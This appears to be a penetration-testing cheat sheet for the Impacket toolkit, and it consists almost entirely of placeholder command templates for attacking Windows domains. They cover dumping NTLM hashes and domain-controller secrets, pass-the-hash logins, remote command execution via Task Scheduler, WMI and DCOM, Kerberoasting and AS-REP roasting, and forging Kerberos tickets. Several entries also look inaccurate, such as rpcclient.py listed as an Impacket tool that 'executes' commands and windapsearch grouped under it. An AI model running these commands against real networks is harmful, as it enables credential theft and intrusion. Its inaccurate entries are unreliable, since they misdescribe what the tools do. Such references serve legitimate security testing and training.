Impacket Toolkit

Impacket Toolkit¶

Impacket is a collection of Python classes for working with network protocols. It is highly regarded in the cybersecurity community for its ability to handle low-level network tasks and its extensive support for various protocols, making it an essential toolkit for penetration testers and security researchers.

SMB/SMB2¶

smbclient.py : Interactive SMB client to work with shares.

Access SMB shares interactively

smbclient.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS]

List all available shares on the target

smbclient.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS] -L

secretsdump.py : Dump secrets from a remote machine without executing any agent.

Dump NTLM hashes of all domain users from a domain controller

secretsdump.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS]

Dump NTLM hashes using Pass-the-Hash

secretsdump.py -hashes [LMHASH]:[NTHASH] [DOMAIN]/[USERNAME]@[IP-ADDRESS]

netview.py : Enumerate shares and sessions on the network.

Enumerate network shares and sessions

netview.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS]

Enumerate shares using Pass-the-Hash

netview.py -hashes [LMHASH]:[NTHASH] [DOMAIN]/[USERNAME]@[IP-ADDRESS]

MSRPC¶

rpcclient.py : Execute client-side MSRPC calls.

Execute MSRPC client calls

rpcclient.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS]

Enumerate domain users

rpcclient.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS] -c "enumdomusers"

Enumerate domain groups

rpcclient.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS] -c "enumdomgroups"

Execute command on target machine

rpcclient.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS] -c "cmd"

rpcdump.py : Dump information about endpoints and interfaces.

Dump RPC endpoints and interfaces info

rpcdump.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS]

Dump RPC endpoints using Pass-the-Hash

rpcdump.py -hashes [LMHASH]:[NTHASH] [DOMAIN]/[USERNAME]@[IP-ADDRESS]

Dump RPC endpoints with no credentials

rpcdump.py -no-pass [DOMAIN]/[USERNAME]@[IP-ADDRESS]

DCE/RPC¶

atexec.py : Execute commands using Task Scheduler.

Execute command using Task Scheduler

atexec.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS] [COMMAND]

Execute command using Pass-the-Hash

atexec.py -hashes [LMHASH]:[NTHASH] [DOMAIN]/[USERNAME]@[IP-ADDRESS] [COMMAND]

Execute command with no credentials

atexec.py -no-pass [DOMAIN]/[USERNAME]@[IP-ADDRESS] [COMMAND]

wmiexec.py : Execute commands via WMI.

Execute command via WMI

wmiexec.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS] [COMMAND]

Execute command using Pass-the-Hash

wmiexec.py -hashes [LMHASH]:[NTHASH] [DOMAIN]/[USERNAME]@[IP-ADDRESS] [COMMAND]

Execute command with no credentials

wmiexec.py -no-pass [DOMAIN]/[USERNAME]@[IP-ADDRESS] [COMMAND]

dcomexec.py : Execute commands using DCOM.

Execute command using DCOM

dcomexec.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS] [COMMAND]

Execute command using Pass-the-Hash

dcomexec.py -hashes [LMHASH]:[NTHASH] [DOMAIN]/[USERNAME]@[IP-ADDRESS] [COMMAND]

Execute command with no credentials

dcomexec.py -no-pass [DOMAIN]/[USERNAME]@[IP-ADDRESS] [COMMAND]

LDAP¶

GetADUsers.py : Enumerate all users in the domain.¶

Enumerate all domain users

GetADUsers.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS]

Enumerate all users including disabled accounts

GetADUsers.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS] -all

Use Pass-the-Hash for enumeration

GetADUsers.py -hashes [LMHASH]:[NTHASH] [DOMAIN]/[USERNAME]@[IP-ADDRESS]

GetUserSPNs.py : Enumerate Service Principal Names (SPNs).¶

Enumerate user SPNs

GetUserSPNs.py [DOMAIN]/[USERNAME]:[PASSWORD] -dc-ip [IP-ADDRESS]

Request TGS for identified SPNs

GetUserSPNs.py [DOMAIN]/[USERNAME]:[PASSWORD] -request -dc-ip [IP-ADDRESS]

Use Pass-the-Hash to enumerate SPNs

GetUserSPNs.py -hashes [LMHASH]:[NTHASH] [DOMAIN]/[USERNAME] -dc-ip [IP-ADDRESS]

windapsearch.py : Perform LDAP queries against Active Directory.¶

Enumerate Group Policy Objects

python3 windapsearch.py --dc-ip [IP-ADDRESS] -u [USERNAME]@[DOMAIN] -p [PASSWORD] --gpos

Enumerate objects with administrative privileges

python3 windapsearch.py --dc-ip [IP-ADDRESS] -u [USERNAME]@[DOMAIN] -p [PASSWORD] --admin-objects

Enumerate users with SPNs

python3 windapsearch.py --dc-ip [IP-ADDRESS] -u [USERNAME]@[DOMAIN] -p [PASSWORD] --user-spns

Enumerate users with unconstrained delegation

python3 windapsearch.py --dc-ip [IP-ADDRESS] -u [USERNAME]@[DOMAIN] -p [PASSWORD] --unconstrained-users

Enumerate computers with unconstrained delegation

python3 windapsearch.py --dc-ip [IP-ADDRESS] -u [USERNAME]@[DOMAIN] -p [PASSWORD] --unconstrained-computers

Kerberos¶

ticketer.py : Generate Kerberos tickets.¶

Generate a TGT ticket for a user

ticketer.py -nthash [NTHASH] -domain-sid [SID] [USERNAME]

Generate a service ticket for a user and SPN

ticketer.py -nthash [NTHASH] -domain-sid [SID] -request [USERNAME] [SPN]

Generate TGT ticket with AES encryption

ticketer.py -aesKey [AESKEY] -domain-sid [SID] [USERNAME]

GetNPUsers.py : Check for accounts with pre-authentication disabled.

Enumerate accounts with pre-auth disabled

GetNPUsers.py [DOMAIN]/[USERNAME]:[PASSWORD] -dc-ip [IP-ADDRESS]

Request TGT for identified accounts

GetNPUsers.py [DOMAIN]/[USERNAME]:[PASSWORD] -request -dc-ip [IP-ADDRESS]

Request TGT using Kerberos authentication

GetNPUsers.py -k [DOMAIN]/[USERNAME] -request -dc-ip [IP-ADDRESS]

NTLM¶

lookupsid.py : Enumerate domain SID information.

Enumerate domain SID info

lookupsid.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS]

Enumerate domain SID info using Pass-the-Hash

lookupsid.py -hashes [LMHASH]:[NTHASH] [DOMAIN]/[USERNAME]@[IP-ADDRESS]

Enumerate domain SID info with no credentials

lookupsid.py -no-pass [DOMAIN]/[USERNAME]@[IP-ADDRESS]

secretsdump.py : Dump secrets from remote machines.

Dump secrets from a remote machine

secretsdump.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS]

Dump secrets from the domain controller

secretsdump.py -just-dc-user [DOMAIN]/[USERNAME]:[PASSWORD]@[IP-ADDRESS]

Dump secrets using Pass-the-Hash

secretsdump.py -hashes [LMHASH]:[NTHASH] [DOMAIN]/[USERNAME]@[IP-ADDRESS]